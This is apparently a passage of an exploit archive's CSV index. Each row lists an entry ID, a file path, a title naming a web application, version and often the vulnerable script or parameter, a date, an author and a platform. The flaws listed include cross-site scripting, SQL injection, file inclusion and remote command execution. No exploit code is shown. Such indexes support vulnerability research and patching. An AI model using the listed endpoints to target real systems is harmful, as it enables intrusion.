-34322,exploits/php/webapps/34322.txt,"PHPWCMS 1.4.5 - 'PHPwcms.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps, -34323,exploits/php/webapps/34323.html,"DSite CMS 4.81 - 'modmenu.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps, -34324,exploits/php/webapps/34324.txt,"FestOS 2.3 - 'contents' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps, -34499,exploits/php/webapps/34499.txt,"ViArt Helpdesk - 'products_search.php?search_category_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps, -34343,exploits/asp/webapps/34343.txt,"MOJO IWms 7 - 'default.asp' Cookie Manipulation",2007-12-17,cp77fk4r,asp,webapps, -34344,exploits/asp/webapps/34344.txt,"Pre Jobo.NET - Multiple SQL Injections",2009-12-17,bi0,asp,webapps, -34345,exploits/java/webapps/34345.txt,"jCore - 'search' Cross-Site Scripting",2009-12-17,loneferret,java,webapps, -34347,exploits/cgi/webapps/34347.txt,"iOffice 0.1 - 'parametre' Remote Command Execution",2010-07-18,"Marshall Whittaker",cgi,webapps, -34349,exploits/php/webapps/34349.txt,"YACS CMS 10.5.27 - 'context[path_to_root]' Remote File Inclusion",2010-07-18,eidelweiss,php,webapps, -34350,exploits/php/webapps/34350.txt,"Sourcefabric Campsite Articles - HTML Injection",2010-07-15,D4rk357,php,webapps, -34351,exploits/php/webapps/34351.html,"BOLDfx eUploader 3.1.1 - 'admin.php' Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic",php,webapps, -34352,exploits/php/webapps/34352.html,"BOLDfx Recipe Script 5.0 - Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic",php,webapps, -34353,exploits/php/webapps/34353.txt,"SnowFlake CMS 0.9.5 Beta - 'uid' SQL Injection",2010-07-19,"Dinesh Arora",php,webapps, -34354,exploits/php/webapps/34354.txt,"TenderSystem 0.9.5 - 'main.php' Multiple Local File Inclusions",2009-12-14,Packetdeath,php,webapps, -34357,exploits/php/webapps/34357.txt,"Scriptsez Ez FAQ Maker 1.0 - Cross-Site Scripting / Cross-Site Request Forgery",2009-12-15,"Milos Zivanovic",php,webapps, -34361,exploits/hardware/webapps/34361.txt,"Tenda A5s Router 3.02.05_CN - Authentication Bypass",2014-08-18,zixian,hardware,webapps,80 -34365,exploits/php/webapps/34365.txt,"Claus Muus Spitfire 1.0.336 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-22,"High-Tech Bridge SA",php,webapps, -34366,exploits/php/webapps/34366.txt,"Stratek Web Design Twilight CMS 4.0 - 'calendar' Cross-Site Scripting",2009-11-02,"Vladimir Vorontsov",php,webapps, -34367,exploits/php/webapps/34367.txt,"Piwigo 2.0 - 'comments.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-28,"Andrew Paterson",php,webapps, -34370,exploits/jsp/webapps/34370.txt,"SAP NetWeaver 6.4/7.0 - 'wsnavigator' Cross-Site Scripting",2010-07-23,"Alexandr Polyakov",jsp,webapps, -34373,exploits/php/webapps/34373.txt,"MC Content Manager 10.1 - SQL Injection / Cross-Site Scripting",2010-07-25,MustLive,php,webapps, -34374,exploits/php/webapps/34374.txt,"Joomla! Component FreiChat 1.0/2.x - HTML Injection",2010-07-26,nag_sunny,php,webapps, -34376,exploits/asp/webapps/34376.txt,"e-Courier CMS - 'UserGUID' Multiple Cross-Site Scripting Vulnerabilities",2009-10-06,BugsNotHugs,asp,webapps, -34377,exploits/php/webapps/34377.txt,"Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities (2)",2010-10-04,Abysssec,php,webapps, -34378,exploits/php/webapps/34378.txt,"Clixint Technologies DPI - Cross-Site Scripting",2009-12-04,anonymous,php,webapps, -34379,exploits/php/webapps/34379.html,"SyndeoCMS 2.9 - Multiple HTML Injection Vulnerabilities",2010-07-26,"High-Tech Bridge SA",php,webapps, -34380,exploits/asp/webapps/34380.txt,"Active Business Directory 2 - 'searchadvance.asp' Cross-Site Scripting",2009-12-22,"Andrea Bocchetti",asp,webapps, -34381,exploits/php/webapps/34381.txt,"MyBB 1.8 Beta 3 - Multiple Vulnerabilities",2014-08-21,"DemoLisH B3yaZ",php,webapps, -34466,exploits/php/webapps/34466.txt,"CMS Source - Multiple Input Validation Vulnerabilities",2010-08-13,"High-Tech Bridge SA",php,webapps, -34383,exploits/php/webapps/34383.txt,"Social Media - 'index.php' Local File Inclusion",2010-07-27,"Harri Johansson",php,webapps, -34384,exploits/jsp/webapps/34384.txt,"Jira 4.0.1 - Cross-Site Scripting / Information Disclosure",2010-07-28,MaXe,jsp,webapps, -34386,exploits/php/webapps/34386.txt,"Cetera eCommerce - Multiple SQL Injections",2010-07-28,MustLive,php,webapps, -34387,exploits/php/webapps/34387.txt,"Cetera eCommerce - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2010-07-28,MustLive,php,webapps, -34388,exploits/php/webapps/34388.txt,"SPIP 2.1 - 'var_login' Cross-Site Scripting",2010-07-28,dotsafe.fr,php,webapps, -34389,exploits/php/webapps/34389.txt,"Impact Software AdPeeps - Cross-Site Scripting / HTML Injection",2010-07-27,Matt,php,webapps, -34391,exploits/php/webapps/34391.txt,"Sourcefabric Campsite - Multiple Cross-Site Scripting Vulnerabilities",2010-07-30,"High-Tech Bridge SA",php,webapps, -34392,exploits/php/webapps/34392.txt,"MyIT CRM - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel Garcia",php,webapps, -34393,exploits/php/webapps/34393.txt,"Joomla! Component com_jigsaw - 'Controller' Directory Traversal",2010-08-03,FL0RiX,php,webapps, -34396,exploits/php/webapps/34396.txt,"FuseTalk 3.2/4.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",php,webapps, -34397,exploits/asp/webapps/34397.txt,"Activedition - '/activedition/aelogin.asp' Multiple Cross-Site Scripting Vulnerabilities",2009-09-25,"Richard Brain",asp,webapps, -34497,exploits/php/webapps/34497.txt,"ViArt Helpdesk - 'reviews.php?category_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps, -34498,exploits/php/webapps/34498.txt,"ViArt Helpdesk - 'forum.php?forum_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps, -34400,exploits/php/webapps/34400.txt,"RaidenTunes - 'music_out.php' Cross-Site Scripting",2014-08-03,LiquidWorm,php,webapps, -34401,exploits/php/webapps/34401.txt,"PHP168 Template Editor - 'Filename' Directory Traversal",2009-10-04,esnra,php,webapps, -34402,exploits/php/webapps/34402.txt,"OpenSolution Quick.Cart - Local File Inclusion / Cross-Site Scripting",2009-10-08,kl3ryk,php,webapps, -34405,exploits/php/webapps/34405.txt,"PHP Stock Management System 1.02 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-08-25,"Ragha Deepthi K R",php,webapps, -34408,exploits/multiple/webapps/34408.txt,"Innovaphone PBX Admin-GUI - Cross-Site Request Forgery",2014-08-25,"Rainer Giedat",multiple,webapps,80 -34409,exploits/multiple/webapps/34409.rb,"ManageEngine Password Manager - MetadataServlet.dat SQL Injection (Metasploit)",2014-08-25,"Pedro Ribeiro",multiple,webapps,8020 -34410,exploits/php/webapps/34410.txt,"PHPFinance 0.6 - '/group.php' SQL Injection / HTML Injection",2010-08-05,skskilL,php,webapps, -34411,exploits/asp/webapps/34411.txt,"DT Centrepiece 4.5 - Cross-Site Scripting / Security Bypass",2010-08-05,"High-Tech Bridge SA",asp,webapps, -34412,exploits/php/webapps/34412.txt,"Hulihan Applications BXR 0.6.8 - SQL Injection / HTML Injection",2010-08-05,"High-Tech Bridge SA",php,webapps, -34413,exploits/php/webapps/34413.txt,"DiamondList - '/user/main/update_settings?setting[site_title]' Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps, -34414,exploits/php/webapps/34414.txt,"DiamondList - '/user/main/update_category?category[description]' Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps, -34415,exploits/php/webapps/34415.txt,"Hulihan Applications Amethyst 0.1.5 - Multiple HTML Injection Vulnerabilities",2010-08-05,"High-Tech Bridge SA",php,webapps, -34416,exploits/php/webapps/34416.txt,"Muraus Open Blog - Multiple HTML Injection Vulnerabilities",2010-08-05,"High-Tech Bridge SA",php,webapps, -34417,exploits/php/webapps/34417.txt,"Prado Portal 1.2 - 'page' Cross-Site Scripting",2010-08-06,"High-Tech Bridge SA",php,webapps, -34418,exploits/php/webapps/34418.txt,"Dataface 1.0 - 'admin.php' Cross-Site Scripting",2010-08-06,MustLive,php,webapps, -34419,exploits/multiple/webapps/34419.txt,"ntopng 1.2.0 - Cross-Site Scripting Injection",2014-08-26,"Steffen Bauch",multiple,webapps, -34420,exploits/cgi/webapps/34420.txt,"VTLS Virtua InfoStation.cgi - SQL Injection",2014-08-26,"José Tozo",cgi,webapps,80 -34526,exploits/php/webapps/34526.pl,"vBulletin 4.0.x < 4.1.2 - 'search.php?cat' SQL Injection",2014-09-03,D35m0nd142,php,webapps,80 -34424,exploits/php/webapps/34424.txt,"WordPress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps, -34429,exploits/asp/webapps/34429.txt,"Allinta CMS 22.07.2010 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-09,"High-Tech Bridge SA",asp,webapps, -34430,exploits/php/webapps/34430.txt,"Preation Eden Platform 27.7.2010 - Multiple HTML Injection Vulnerabilities",2010-08-09,"High-Tech Bridge SA",php,webapps, -34432,exploits/php/webapps/34432.txt,"Wowd - 'index.html' Multiple Cross-Site Scripting Vulnerabilities",2009-10-29,Lostmon,php,webapps, -34433,exploits/php/webapps/34433.txt,"Simple Directory Listing 2.1 - 'SDL2.php' Cross-Site Scripting",2010-10-22,"Amol Naik",php,webapps, -34456,exploits/php/webapps/34456.txt,"JBoard - Multiple Cross-Site Scripting / SQL Injections",2009-08-31,Inj3ct0r,php,webapps, -34436,exploits/php/webapps/34436.txt,"WordPress Plugin ShortCode 0.2.3 - Local File Inclusion",2014-08-28,"Mehdi Karout & Christian Galeone",php,webapps, -34438,exploits/php/webapps/34438.txt,"MybbCentral TagCloud 2.0 - 'Topic' HTML Injection",2010-08-11,3ethicalhackers.com,php,webapps, -34440,exploits/jsp/webapps/34440.txt,"Computer Associates Oneview Monitor 6.0 - 'doSave.jsp' Remote Code Execution",2010-08-12,"Giorgio Fedon",jsp,webapps, -34441,exploits/php/webapps/34441.txt,"JForum 2.08 - BBCode Color Tag HTML Injection",2010-05-13,"Giorgio Fedon",php,webapps, -34443,exploits/php/webapps/34443.txt,"PaoLink 1.0 - 'scrivi.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps, -34444,exploits/php/webapps/34444.txt,"RSSMediaScript - 'index.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps, -34445,exploits/php/webapps/34445.txt,"LiveStreet 0.2 - Comment Topic Header Cross-Site Scripting",2009-08-31,Inj3ct0r,php,webapps, -34446,exploits/php/webapps/34446.txt,"LiveStreet 0.2 - '/include/ajax/blogInfo.php?asd' Cross-Site Scripting",2009-08-31,Inj3ct0r,php,webapps, -34447,exploits/php/webapps/34447.py,"Plogger 1.0-RC1 - Authenticated Arbitrary File Upload",2014-08-28,b0z,php,webapps,80 -34449,exploits/multiple/webapps/34449.txt,"ManageEngine DeviceExpert 5.9 - User Credential Disclosure",2014-08-28,"Pedro Ribeiro",multiple,webapps, -34450,exploits/php/webapps/34450.py,"ActualAnalyzer Lite 2.81 - Unauthenticated Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 -34451,exploits/php/webapps/34451.py,"PhpWiki - Remote Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 -34452,exploits/php/webapps/34452.py,"XRms - Blind SQL Injection / Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 -34453,exploits/php/webapps/34453.txt,"PaoBacheca 2.1 - 'index.php' URI Cross-Site Scripting",2009-09-16,Moudi,php,webapps, -34454,exploits/php/webapps/34454.txt,"PaoBacheca 2.1 - 'scrivi.php' URI Cross-Site Scripting",2009-09-16,Moudi,php,webapps, -34455,exploits/php/webapps/34455.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injections (2)",2010-08-12,Affix,php,webapps, -34459,exploits/php/webapps/34459.txt,"Amiro.CMS 5.4 - Multiple Input Validation Vulnerabilities",2009-10-19,"Vladimir Vorontsov",php,webapps, -34464,exploits/php/webapps/34464.txt,"SyntaxCMS - 'rows_per_page' SQL Injection",2010-08-10,"High-Tech Bridge SA",php,webapps, -34467,exploits/php/webapps/34467.txt,"Edit-X PHP CMS - 'search_text' Cross-Site Scripting",2010-08-13,"High-Tech Bridge SA",php,webapps, -34468,exploits/php/webapps/34468.html,"Mystic 0.1.4 - Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",php,webapps, -34469,exploits/php/webapps/34469.html,"Onyx - Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",php,webapps, -34470,exploits/php/webapps/34470.txt,"Beex - 'news.php?navaction' Cross-Site Scripting",2009-09-01,Moudi,php,webapps, -34471,exploits/php/webapps/34471.txt,"Beex - 'partneralle.php?navaction' Cross-Site Scripting",2009-09-01,Moudi,php,webapps, -34472,exploits/php/webapps/34472.txt,"PHPMass Real Estate - 'view_map.php' Cross-Site Scripting",2009-09-01,Moudi,php,webapps, -34473,exploits/php/webapps/34473.txt,"Property Watch - 'email.php?videoid' Cross-Site Scripting",2009-09-01,Moudi,php,webapps, -34474,exploits/php/webapps/34474.txt,"Property Watch - 'login.php?redirect' Cross-Site Scripting",2009-09-01,Moudi,php,webapps, -34475,exploits/php/webapps/34475.txt,"Joomla! Component Weblinks - 'Itemid' SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps, -34476,exploits/php/webapps/34476.txt,"Zomplog 3.9 - 'message' Cross-Site Scripting",2010-08-15,10n1z3d,php,webapps, -34477,exploits/php/webapps/34477.txt,"Joomla! Component com_fireboard - 'Itemid' SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps, -34479,exploits/php/webapps/34479.html,"CMSimple 3.3 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-16,"High-Tech Bridge SA",php,webapps, -34481,exploits/php/webapps/34481.txt,"123 Flash Chat - Multiple Vulnerabilities",2010-08-16,Lincoln,php,webapps, -34482,exploits/php/webapps/34482.txt,"TurnkeyForms Yahoo Answers Clone - 'questiondetail.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps, -34483,exploits/php/webapps/34483.txt,"Nasim Guest Book - 'page' Cross-Site Scripting",2010-08-10,Moudi,php,webapps, -34484,exploits/php/webapps/34484.txt,"Joomla! Component com_dirfrm - Multiple SQL Injections",2010-08-18,Hieuneo,php,webapps, -34485,exploits/php/webapps/34485.txt,"FreeSchool - 'key_words' Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps, -34486,exploits/php/webapps/34486.txt,"phpCMS 2008 - 'download.php' Information Disclosure",2009-10-19,Securitylab.ir,php,webapps, -34487,exploits/php/webapps/34487.txt,"Facil Helpdesk - 'kbase/kbase.php' URI Cross-Site Scripting",2009-08-07,Moudi,php,webapps, -34492,exploits/asp/webapps/34492.txt,"Online Work Order Suite Lite Edition - Multiple Cross-Site Scripting Vulnerabilities",2009-08-10,Moudi,asp,webapps, -34493,exploits/php/webapps/34493.txt,"Payment Processor Script (PPScript) - 'shop.htm' SQL Injection",2009-08-03,MizoZ,php,webapps, -34494,exploits/php/webapps/34494.txt,"ViArt Helpdesk - 'products.php?category_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps, -34495,exploits/php/webapps/34495.txt,"ViArt Helpdesk - 'article.php?category_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps, -34496,exploits/php/webapps/34496.txt,"ViArt Helpdesk - 'product_details.php?category_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps, -34501,exploits/php/webapps/34501.txt,"Hitron Soft Answer Me - 'answers.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps, -34503,exploits/php/webapps/34503.txt,"Syntax Highlighter 3.0.83 - 'index.html' HTML Injection",2010-08-19,indoushka,php,webapps, -34504,exploits/php/webapps/34504.txt,"Cacti 0.8.7 (RedHat High Performance Computing [HPC]) - 'utilities.php?Filter' Cross-Site Scripting",2010-08-19,"Marc Schoenefeld",php,webapps, -34508,exploits/php/webapps/34508.txt,"AneCMS 1.0/1.3 - 'register/next' SQL Injection",2010-08-23,Sweet,php,webapps, -34511,exploits/php/webapps/34511.txt,"Mulitple WordPress Themes - 'admin-ajax.php?img' Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 -34513,exploits/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Persistent Cross-Site Scripting",2014-09-01,"Prakhar Prasad",multiple,webapps, -34514,exploits/php/webapps/34514.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80 -34518,exploits/jsp/webapps/34518.txt,"ManageEngine DesktopCentral - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",jsp,webapps, -34519,exploits/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",jsp,webapps,8400 -34524,exploits/php/webapps/34524.txt,"WordPress Plugin Huge-IT Image Gallery 1.0.1 - Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80 -34525,exploits/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python)",2014-09-02,"Dolev Farhi",multiple,webapps, -34637,exploits/php/webapps/34637.txt,"Joomla! Component com_formmaker 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",php,webapps, -34684,exploits/php/webapps/34684.pl,"Joomla! Component com_spain - 'nv' SQL Injection",2010-09-20,FL0RiX,php,webapps, -34531,exploits/php/webapps/34531.txt,"BlastChat Client 3.3 - Cross-Site Scripting",2010-08-25,"Aung Khant",php,webapps, -34533,exploits/php/webapps/34533.txt,"Auto CMS 1.6 - 'autocms.php' Cross-Site Scripting",2010-08-23,"High-Tech Bridge SA",php,webapps, -34534,exploits/php/webapps/34534.txt,"TCMS - Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps, -34535,exploits/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 - Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps, -34536,exploits/php/webapps/34536.txt,"CompuCMS - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps, -34538,exploits/php/webapps/34538.txt,"WordPress Plugin Premium Gallery Manager - Unauthenticated Configuration Access",2014-09-05,Hannaichi,php,webapps,80 -34539,exploits/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Persistent Cross-Site Scripting",2014-09-05,"Fikri Fadzil",php,webapps,80 -34541,exploits/php/webapps/34541.txt,"WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection",2010-08-29,MiND,php,webapps, -34543,exploits/php/webapps/34543.txt,"HP Insight Diagnostics Online Edition 8.4 - 'parameters.php?device' Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps, -34544,exploits/php/webapps/34544.txt,"HP Insight Diagnostics Online Edition 8.4 - 'idstatusframe.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-31,"Mr Teatime",php,webapps, -34545,exploits/php/webapps/34545.txt,"HP Insight Diagnostics Online Edition 8.4 - 'survey.php?category' Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps, -34546,exploits/php/webapps/34546.txt,"HP Insight Diagnostics Online Edition 8.4 - 'globals.php?tabpage' Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps, -34547,exploits/php/webapps/34547.txt,"HP Insight Diagnostics Online Edition 8.4 - 'custom.php?testmode' Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps, -34548,exploits/php/webapps/34548.txt,"Datemill - 'photo_view.php?return' Cross-Site Scripting",2009-09-10,Moudi,php,webapps, -34549,exploits/php/webapps/34549.txt,"Datemill - 'photo_search.php?st' Cross-Site Scripting",2009-09-10,Moudi,php,webapps, -34550,exploits/php/webapps/34550.txt,"Datemill - 'search.php?st' Cross-Site Scripting",2009-09-10,Moudi,php,webapps, -34551,exploits/php/webapps/34551.txt,"IP Board 3.x - Cross-Site Request Forgery / Token Hjiacking",2014-09-07,"Piotr S.",php,webapps, -34552,exploits/php/webapps/34552.txt,"LoadedCommerce7 - Systemic Query Factory",2014-09-07,Breaking.Technology,php,webapps, -34553,exploits/php/webapps/34553.txt,"WordPress Plugin Like Dislike Counter 1.2.3 - SQL Injection",2014-09-07,Att4ck3r.ir,php,webapps, -34555,exploits/php/webapps/34555.txt,"PhpOnlineChat 3.0 - Cross-Site Scripting",2014-09-07,"N0 Feel",php,webapps, -34604,exploits/php/webapps/34604.php,"BlueCMS 1.6 - 'x-forwarded-for' Header SQL Injection",2010-09-06,cnryan,php,webapps, -34558,exploits/php/webapps/34558.txt,"Amiro.CMS 5.8.4.0 - Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps, -34559,exploits/php/webapps/34559.txt,"Rumba XML 2.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps, -34560,exploits/php/webapps/34560.html,"ArtGK CMS - Cross-Site Scripting / HTML Injection",2010-09-01,"High-Tech Bridge SA",php,webapps, -34561,exploits/php/webapps/34561.txt,"KingCMS 0.6 - 'CONFIG[AdminPath]' Remote File Inclusion",2009-09-07,Securitylab.ir,php,webapps, -34562,exploits/php/webapps/34562.txt,"AdaptBB 1.0 - 'q' Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps, -34563,exploits/php/webapps/34563.txt,"OneCMS 2.6.1 - 'index.php' Cross-Site Scripting",2010-09-02,anT!-Tr0J4n,php,webapps, -34564,exploits/php/webapps/34564.txt,"CMS WebManager-Pro - 'c.php' SQL Injection",2010-09-02,MustLive,php,webapps, -34565,exploits/php/webapps/34565.txt,"NuSOAP 0.9.5 - 'nusoap.php' Cross-Site Scripting",2010-09-03,"Bogdan Calin",php,webapps, -34578,exploits/php/webapps/34578.txt,"WordPress Theme Acento - 'view-pdf.php?File' Arbitrary File Download",2014-09-08,alieye,php,webapps,80 -34581,exploits/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 -34571,exploits/php/webapps/34571.py,"Joomla! Component Spider Calendar 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps, -34572,exploits/php/webapps/34572.txt,"WordPress Plugin Bulk Delete Users by Email 1.0 - Cross-Site Request Forgery",2014-09-08,"Fikri Fadzil",php,webapps, -34580,exploits/php/webapps/34580.txt,"phpMyFAQ 2.8.x - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 -34579,exploits/php/webapps/34579.txt,"vBulletin 5.1.x - Persistent Cross-Site Scripting",2014-09-08,smash,php,webapps,80 -34924,exploits/windows/webapps/34924.txt,"BMC Track-It! - Multiple Vulnerabilities",2014-10-09,"Pedro Ribeiro",windows,webapps, -34582,exploits/php/webapps/34582.txt,"osCommerce 2.3.4 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 -34583,exploits/hardware/webapps/34583.txt,"TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80 -34584,exploits/hardware/webapps/34584.txt,"TP-Link TL-WR841N / TL-WR841ND - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80 -34585,exploits/php/webapps/34585.txt,"Atmail Webmail 7.2 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,443 -34586,exploits/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",php,webapps,80 -34587,exploits/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,multiple,webapps,8090 -34589,exploits/php/webapps/34589.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 2.0 - Multiple Vulnerabilities",2014-09-09,"Fikri Fadzil",php,webapps, -34593,exploits/php/webapps/34593.txt,"Parallels Plesk Sitebuilder 9.5 - Multiple Vulnerabilities",2014-09-09,alieye,php,webapps, -34596,exploits/php/webapps/34596.txt,"Pligg CMS 1.0.4 - SQL Injection / Cross-Site Scripting",2010-09-03,"Bogdan Calin",php,webapps, -34597,exploits/php/webapps/34597.txt,"Datetopia Buy Dating Site - Cross-Site Scripting",2010-09-10,Moudi,php,webapps, -34598,exploits/php/webapps/34598.txt,"SZNews 2.7 - 'printnews.php3' Remote File Inclusion",2009-09-11,"kurdish hackers team",php,webapps, -34599,exploits/php/webapps/34599.txt,"tourismscripts HotelBook - 'hotel_id' Multiple SQL Injections",2009-09-10,Mr.SQL,php,webapps, -34600,exploits/php/webapps/34600.txt,"Match Agency BiZ - 'edit_profile.php?important' Cross-Site Scripting",2009-09-11,Moudi,php,webapps, -34601,exploits/php/webapps/34601.txt,"Match Agency BiZ - 'report.php?pid' Cross-Site Scripting",2009-09-11,Moudi,php,webapps, -34605,exploits/php/webapps/34605.txt,"Horde Application Framework 3.3.8 - 'icon_browser.php' Cross-Site Scripting",2010-09-06,"Moritz Naumann",php,webapps, -34606,exploits/php/webapps/34606.txt,"Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting",2009-09-02,Moudi,php,webapps, -34607,exploits/php/webapps/34607.txt,"TBDev 2.0 - Remote File Inclusion / SQL Injection",2010-09-02,Inj3ct0r,php,webapps, -34608,exploits/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Inclusion",2010-09-06,"MiND C0re",php,webapps, -34609,exploits/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps, -34610,exploits/php/webapps/34610.txt,"ZenPhoto 1.3 - '/zp-core/full-image.php?a' SQL Injection",2010-09-07,"Bogdan Calin",php,webapps, -34611,exploits/php/webapps/34611.txt,"ZenPhoto 1.3 - '/zp-core/admin.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-07,"Bogdan Calin",php,webapps, -34805,exploits/php/webapps/34805.txt,"StatsCode - Multiple Cross-Site Scripting Vulnerabilities",2009-07-09,"599eme Man",php,webapps, -34806,exploits/php/webapps/34806.txt,"JNM Guestbook 3.0 - 'index.php' Cross-Site Scripting",2009-07-09,Moudi,php,webapps, -34807,exploits/php/webapps/34807.txt,"JNM Solutions DB Top Sites 1.0 - 'vote.php' Cross-Site Scripting",2009-07-08,Moudi,php,webapps, -34808,exploits/php/webapps/34808.txt,"Rapidsendit Clone Script - 'admin.php' Insecure Cookie Authentication Bypass",2009-07-08,NoGe,php,webapps, -34614,exploits/asp/webapps/34614.txt,"SmarterTools SmarterStats 5.3.3819 - 'frmHelp.aspx' Cross-Site Scripting",2010-09-09,"David Hoyt",asp,webapps, -34683,exploits/php/webapps/34683.txt,"e-soft24 Article Directory Script - 'q' Cross-Site Scripting",2009-08-30,"599eme Man",php,webapps, -34616,exploits/php/webapps/34616.txt,"Elkagroup Elkapax - 'q' Cross-Site Scripting",2009-08-13,Isfahan,php,webapps, -34617,exploits/php/webapps/34617.txt,"Waverider Systems Perlshop - Multiple Input Validation Vulnerabilities",2009-08-06,Shadow,php,webapps, -34618,exploits/php/webapps/34618.txt,"Omnistar Recruiting - 'resume_register.php' Cross-Site Scripting",2009-09-06,MizoZ,php,webapps, -34619,exploits/php/webapps/34619.txt,"PaysiteReviewCMS 1.1 - 'search.php' Cross-Site Scripting",2010-09-14,"Valentin Hoebel",php,webapps, -34620,exploits/php/webapps/34620.txt,"PaysiteReviewCMS - 'image.php' Cross-Site Scripting",2010-09-14,"Valentin Hoebel",php,webapps, -34751,exploits/hardware/webapps/34751.pl,"ZYXEL Prestig P-660HNU-T1 - ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80 -34624,exploits/php/webapps/34624.txt,"OroCRM - Persistent Cross-Site Scripting",2014-09-11,Provensec,php,webapps,80 -34625,exploits/php/webapps/34625.py,"Joomla! Component Spider Contacts 1.3.6 - 'contacts_id' SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 -34626,exploits/ios/webapps/34626.txt,"Photorange 1.0 iOS - Local File Inclusion",2014-09-11,Vulnerability-Lab,ios,webapps,9900 -34627,exploits/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent Cross-Site Scripting",2014-09-11,Vulnerability-Lab,ios,webapps, -34628,exploits/php/webapps/34628.txt,"Santafox 2.0.2 - 'search' Cross-Site Scripting",2010-09-06,"High-Tech Bridge SA",php,webapps, -34629,exploits/php/webapps/34629.txt,"AContent 1.0 - Cross-Site Scripting / HTML Injection",2010-09-15,"High-Tech Bridge SA",php,webapps, -34630,exploits/php/webapps/34630.txt,"AChecker 1.0 - 'URI' Cross-Site Scripting",2010-09-15,"High-Tech Bridge SA",php,webapps, -34631,exploits/php/webapps/34631.txt,"ATutor 1.0 - Multiple 'cid' Cross-Site Scripting Vulnerabilities",2010-09-15,"High-Tech Bridge SA",php,webapps, -34632,exploits/php/webapps/34632.txt,"Multi Website 1.5 - 'search' HTML Injection",2009-08-06,"599eme Man",php,webapps, 